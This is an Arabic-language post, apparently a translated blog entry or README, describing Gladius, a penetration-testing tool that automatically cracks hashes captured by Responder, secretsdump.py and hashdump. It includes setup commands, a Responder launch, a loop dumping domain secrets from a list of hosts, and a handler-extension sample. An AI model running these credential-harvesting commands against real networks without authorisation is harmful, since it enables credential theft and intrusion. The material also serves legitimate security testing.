
التكسير الآلي لـ Responder و secretsdump.py
المؤلف: Cory Duplantis (@ctfhacker) / مدونة
يوفر Gladius طريقة آلية لتكسير بيانات الاعتماد من مصادر مختلفة أثناء الاختراق. نقوم حالياً بتكسير التجزئة من Responder وsecretsdump.py وsmart_hashdump.
pip install watchdog
git clone https://www.github.com/praetorian-inc/gladius
cd gladius
git clone https://www.github.com/praetorian-inc/Hob0Rules
cp Hob0Rules/* .
rm -rf Hob0Rules/
python gladius.py --hashcat ../hashcat/hashcat-cli64.bin -r d3adhob0.rule -w rockyou.txt
الآن ابدأ جلسة Responder كالمعتاد
cd /usr/share/responder
python Responder.py -i YOUR_IP -I YOUR_INTERFACE
أرسل نتائج secretsdump إلى Gladius لتحليلها وتكسيرها.
for ip in $(cat ips); do secretsdump.py DOMAIN/username:password@$ip > /usr/share/responder/secretsdump_$ip; done
$ python gladius.py -h
usage: gladius.py [-h] [-v] [--responder-dir RESPONDER_DIR]
[--hashcat HASHCAT] [-r RULESET] [-w WORDLIST] [--no-art]
optional arguments:
-h, --help show this help message and exit
-v, --verbose Increased output verbosity
--responder-dir RESPONDER_DIR
Directory to watch for Responder output
--hashcat HASHCAT Path to hashcat binary
-r RULESET, --ruleset RULESET
Ruleset to use with hashcat
-w WORDLIST, --wordlist WORDLIST
Wordlist to use with hashcat
--no-art Disable the sword ascii art for displaying credentials
and default to only text.
مجموعة القواعد الافتراضية هي مجموعة best64 محسنة من Julian Dunning (@hob0man) من Praetorian. يمكن العثور على عرضه التقديمي حول الموضوع أدناه:
يراقب سجل Responder بحثاً عن ملفات *NTLM*txt. لكل ملف يتم العثور عليه، يحلل المخرجات، وينشئ ملفاً مؤقتاً يحتوي على التجزئة الجديدة، ويمررها إلى hashcat مع نوع التجزئة الصحيح.
لمراقبة تجزئة NTLM من hashdump، ببساطة أنشئ ملفاً يحتوي على تجزئة NTLM من hashdump وقم بإسقاط ملف باسم
hashdumpفي دليل Responder. ملاحظة: ستحتاج إلى فحص المخرجات يدوياً في./engagement/responderhander_out/*للتحقق من نتائج تكسيرhashdump.
يراقب المخرجات من hashcat ويصدر ملفات بالتنسيق التالي:
Domain Username Password
لتوسيع Gladius:
GladiusHandler.'*' إذا كان اسم الملف غير مهم).process(self, event) لتنفيذ إجراءات على جميع الملفات المطابقة لنمطك.class YourHandler(GladiusHandler):
patterns = ['*']
def process(self, event):
data = self.get_lines(event)
# Perform work on data
أضف نفسك إلى قائمة المعالجات
handlers = [
(ResponderHandler, args.responder,
(CredsHandler, ResponderHandler().outpath),
(YourHandler, CredsHandler().outpath),
(YourHandler, '/tmp'),
]